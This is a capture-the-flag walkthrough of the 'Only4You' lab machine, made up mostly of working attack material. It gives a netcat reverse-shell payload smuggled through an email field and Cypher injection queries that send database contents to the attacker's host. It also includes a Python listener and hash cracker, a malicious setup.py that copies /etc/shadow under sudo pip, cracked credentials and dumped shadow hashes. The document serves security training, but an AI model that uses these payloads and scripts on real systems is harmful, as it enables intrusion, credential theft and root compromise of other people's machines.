Basic information

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.210
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-24 10:24 CST
Nmap scan report for 10.10.11.210
Host is up (0.093s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e883e0a9fd43df38198aaa35438411ec (RSA)
| 256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_ 256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.69 seconds

80

A hosts entry is needed; it is a company website:

10.10.11.210 only4you.htb

Subdomain scan

Subdomain enumeration finds beta:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://only4you.htb/" -H 'Host: FUZZ.only4you.htb' -fs 178

[Status: 200, Size: 2191, Words: 370, Lines: 52, Duration: 299ms]
* FUZZ: beta

beta.only4you.htb

After adding a hosts entry for it as well, the site offers a source code download:

beta source

From the code it is a Flask application. The download route has an LFI: the filename may not contain .. and may not start with ../, but an absolute path is accepted as-is:

LFI

Read the files one by one:

/etc/nginx/sites-available/default
/var/www/only4you.htb/app.py
/var/www/only4you.htb/form.py
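To make the bypass concrete, here is a reconstruction of the described filter next to a containment check. This is an added example, not code from the box's app.py; BASE_DIR is an assumed serving directory and the regex-free check mirrors only what the writeup states (reject "..", reject a leading "../", otherwise join and open). The key detail is that os.path.join discards the base when the second argument is absolute, which is exactly why /etc/nginx/sites-available/default could be read.

```python
"""Path filter as the writeup describes it, beside a containment check (added example)."""
import os

# Assumption: the directory the download route is meant to serve files from.
BASE_DIR = "/var/www/only4you.htb/static"


def resolve_vulnerable(base, name):
    """Reconstruction of the described check: reject '..' and a leading '../',
    then join. os.path.join() drops `base` entirely when `name` is absolute,
    so '/etc/passwd' sails through while '../app.py' is blocked."""
    if ".." in name or name.startswith("../"):
        return None
    return os.path.join(base, name)


def resolve_safe(base, name):
    """Normalise first, then require the result to stay under base.
    Returns the resolved path, or None if the request escapes the directory."""
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, name))
    # commonpath() compares normalised components, so '/etc/passwd',
    # 'a/../../app.py' and a symlink pointing outside all fail here.
    if candidate == base_real or os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("style.css", "../app.py", "/etc/passwd", "a/../../app.py"):
        print(f"{probe!r:22} vulnerable={resolve_vulnerable(BASE_DIR, probe)!r:40} safe={resolve_safe(BASE_DIR, probe)!r}")
```

The fix is the containment test, not a longer denylist: every variant the denylist misses (absolute paths here, URL-encoded dots or symlinks elsewhere) still has to pass through realpath() and land under the base.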

The domain part of the email is concatenated into a command that gets executed. There is some filtering, but note how the check is done: as long as the regex matches a valid-looking address somewhere in the string, processing continues with the rest of the input attached, which leads to command injection:

Command injection shell

Use the command injection to get a www-data shell:

1@1.com|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f
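The match-versus-fullmatch distinction is the whole bug, so here it is side by side. This is an added example, not the box's form.py: the email regex and the dig lookup are assumptions (the writeup only says the domain is spliced into an executed command), and the functions return the command that would run instead of running it.

```python
"""Email-domain command injection: the weak check as described, and a fix (added example)."""
import re

# Assumed validation pattern; the writeup does not reproduce the app's regex.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Assumption: the app resolves the domain with dig. The writeup only states
# that the domain is concatenated into a command that is executed.
LOOKUP = "dig txt"


def build_command_vulnerable(email):
    """Mirrors the described logic. re.match() is satisfied by a valid-looking
    prefix ('1@1.com'), so everything after it rides along into the shell
    command string that would be handed to subprocess with shell=True."""
    if not EMAIL_RE.match(email):
        return None
    domain = email.split("@")[1]          # keeps '|', ';' and anything that follows
    return f"{LOOKUP} {domain}"


def build_command_safe(email):
    """Require the whole input to be an address, then return an argv list so
    no shell ever parses the domain (subprocess.run(argv, shell=False))."""
    if not EMAIL_RE.fullmatch(email):
        return None
    domain = email.split("@", 1)[1]
    return LOOKUP.split() + [domain]


if __name__ == "__main__":
    payload = "1@1.com|id"
    print("vulnerable:", build_command_vulnerable(payload))   # shell runs dig, then id
    print("safe:      ", build_command_safe(payload))         # None: rejected
    print("safe:      ", build_command_safe("john@only4you.htb"))
```

Note that fullmatch alone is not the fix; the argv list is. Even a strict regex can be loosened later, whereas a command that is never parsed by a shell has no metacharacters to inject.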

socks proxy

Quick enumeration shows several services bound to local ports, so set up a proxy:

wget http://10.10.14.8:7777/chisel_1.7.6_linux_amd64
chmod +x chisel_1.7.6_linux_amd64

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# target
./chisel_1.7.6_linux_amd64 client 10.10.14.8:9999 R:socks

info

gogs 3000

Port 3000 is Gogs:

Neo4j 7474

Port 7474 is Neo4j:

8001

Port 8001 requires a login; the trivial admin:admin gets in:

Cypher Injection

Given what we know so far, the service on 8001 is most likely backed by Neo4j, so try Neo4j Cypher injection:

' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.8:7777/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

From there it is a matter of pulling information out step by step, which yields usernames and password hashes:

' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://10.10.14.8:7777/?label='+label as l RETURN 0 as _0 //

' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.8:7777/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

Crack the hashes to recover the passwords:

admin a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 ThisIs4You
john 8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 admin
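The three injected queries above push one HTTP request per value through LOAD CSV, so the listener on 7777 is the real output channel. This added example (not the box's code) covers both the extraction and the cracking step: it parses python -m http.server style log lines, rebuilds one row per node from the UNWIND keys(f) callbacks, and runs a dictionary attack whose algorithm is guessed from the digest length. The log lines and wordlist are constructed; the two hashes are the ones dumped above, and the MATCH query in build_injected_query is illustrative because the real query behind port 8001 is not shown in the writeup.

```python
"""Catch LOAD CSV exfil callbacks, rebuild the dumped nodes, crack the hashes (added example)."""
import hashlib
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in python -m http.server log format. The hashes are the
# ones recovered in the writeup; timestamps and ordering are made up.
SAMPLE_LOG = [
    '10.10.11.210 - - [24/Apr/2023 10:50:30] "GET /?label=user HTTP/1.1" 200 -',
    '10.10.11.210 - - [24/Apr/2023 10:51:02] "GET /?name=admin HTTP/1.1" 200 -',
    '10.10.11.210 - - [24/Apr/2023 10:51:02] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -',
    '10.10.11.210 - - [24/Apr/2023 10:51:03] "GET /?name=john HTTP/1.1" 200 -',
    '10.10.11.210 - - [24/Apr/2023 10:51:03] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -',
]
# Constructed stand-in for rockyou.
WORDLIST = ["123456", "password", "admin", "ThisIs4You", "letmein"]

REQUEST_RE = re.compile(r'"GET (?P<path>\S+) HTTP/')


def build_injected_query(user_input):
    """Illustrative vulnerable query (assumption: the real one is unknown).
    A leading ' closes the literal, the trailing // comments out the tail."""
    return f"MATCH (u:user) WHERE u.name = '{user_input}' RETURN u.name"


def extract_pairs(log_lines):
    """Return every key=value LOAD CSV fetched, in arrival order."""
    pairs = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m:
            pairs.extend(parse_qsl(urlsplit(m.group("path")).query, keep_blank_values=True))
    return pairs


def rebuild_rows(pairs, keys):
    """UNWIND keys(f) sends one request per property of each node, so a key
    that repeats means the next node has started: split rows there."""
    rows, current = [], {}
    for key, value in pairs:
        if key not in keys:
            continue
        if key in current:
            rows.append(current)
            current = {}
        current[key] = value
    if current:
        rows.append(current)
    return rows


def crack(digest_hex, words):
    """Dictionary attack; pick the algorithm from the hex digest length."""
    algo = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}.get(len(digest_hex))
    if algo is None:
        return None
    for word in words:
        if hashlib.new(algo, word.encode()).hexdigest() == digest_hex.lower():
            return word
    return None


class ExfilHandler(BaseHTTPRequestHandler):
    """Live receiver: same parsing as extract_pairs, answers with a tiny CSV
    body so LOAD CSV has a row to read and the injected query completes."""
    collected = []

    def do_GET(self):
        pairs = parse_qsl(urlsplit(self.path).query, keep_blank_values=True)
        ExfilHandler.collected.extend(pairs)
        print(pairs)
        self.send_response(200)
        self.send_header("Content-Type", "text/csv")
        self.end_headers()
        self.wfile.write(b"x\n")


if __name__ == "__main__":
    # Offline run over the constructed log, then the live listener on 7777.
    rows = rebuild_rows(extract_pairs(SAMPLE_LOG), {"name", "password"})
    for row in rows:
        print(row["name"], row["password"], crack(row["password"], WORDLIST))
    HTTPServer(("0.0.0.0", 7777), ExfilHandler).serve_forever()
```

Run it in place of python -m http.server while the second and third payloads execute; the row split on a repeated key is what turns the flat stream of name=... / password=... callbacks back into per-user records.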

user flag & Gogs

Combining the recovered usernames and passwords gives a pair that works for both SSH and Gogs:

john : ThisIs4You

user flag

The user flag is in john's home directory:

Privilege escalation info

Checking sudo shows we may run pip3 download as root, fetching from the local Gogs:

The intended route is clearly to host a malicious package on Gogs and let pip fetch it. Although the verb is download, pip still executes the package's setup.py while processing the sdist, so the code runs as root:

Privilege escalation & root flag

Modify the code in the demo's setup.py, build the package, and push it to Gogs:

pip3 install build
python3 -m build

http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz

sudo /usr/bin/pip3 download http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
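The setup.py that makes this work, as an added example rather than the author's file. The package name and version match the archive above; the payload (copy /etc/shadow to a world-readable file in /tmp) is an assumption that fits the shadow dump that follows. The module-level side effect is the whole point: pip reads sdist metadata by running setup.py, so whatever is placed before setup() executes with the privileges of the invoking user, here root via sudo. The selftest() helper exercises the copy on a temporary file with constructed content so the routine can be checked without touching /etc/shadow.

```python
"""setup.py for a package that runs code when pip processes it (added example)."""
# pip3 download fetches the sdist and then runs this file (setup.py egg_info)
# to obtain the metadata, so module-level code executes as the invoking user.
import os
import shutil
import stat
import tempfile

# Assumption: leak /etc/shadow to a path the low-privilege user can read.
SOURCE = "/etc/shadow"
TARGET = "/tmp/shadow_copy"


def exfil_copy(src, dst):
    """Copy src to dst and make it world-readable; True on success."""
    try:
        shutil.copyfile(src, dst)
        os.chmod(dst, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)  # 0644
        return True
    except OSError:
        return False


def selftest():
    """Run exfil_copy against a constructed 0600 file instead of /etc/shadow."""
    with tempfile.TemporaryDirectory() as workdir:
        src = os.path.join(workdir, "secret")
        dst = os.path.join(workdir, "leaked")
        with open(src, "w") as fh:
            fh.write("root:x:19326:0:99999:7:::\n")   # constructed shadow-style line
        os.chmod(src, 0o600)
        ok = exfil_copy(src, dst)
        mode = stat.S_IMODE(os.stat(dst).st_mode)
        with open(dst) as fh:
            content = fh.read()
    return ok and mode == 0o644 and content.startswith("root:")


if __name__ == "__main__":
    # pip invokes this file as __main__, so the payload runs before setup().
    from setuptools import setup

    exfil_copy(SOURCE, TARGET)
    setup(name="this_is_fine_wuzzi", version="0.0.1", packages=[])
```

After python3 -m build, push the resulting this_is_fine_wuzzi-0.0.1.tar.gz to the Gogs repo and point the sudo pip3 download at its raw URL; the copy in /tmp appears whether or not the download itself "succeeds".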

shadow

root:$6$TJLQffVnCXmnRBpq$Shtj6r4nJt672cmV2bhnlK9wb6YlI1tKpJoupUoVM/LFd7vmbLuDX4jtlYW3Lcft2sjWmHk5h58Q8vaFDOtFR.:19326:0:99999:7:::
john:$6$BBuIQ1RjM9BXy2zw$5.O1009Bf4oXy/qGS5dp9U514X5GJMbkYBGgcWlmTVCzn3H.E6wF1cVAmjZzf8UCExE0dmfxGylCix6q29icq0:19326:0:99999:7:::
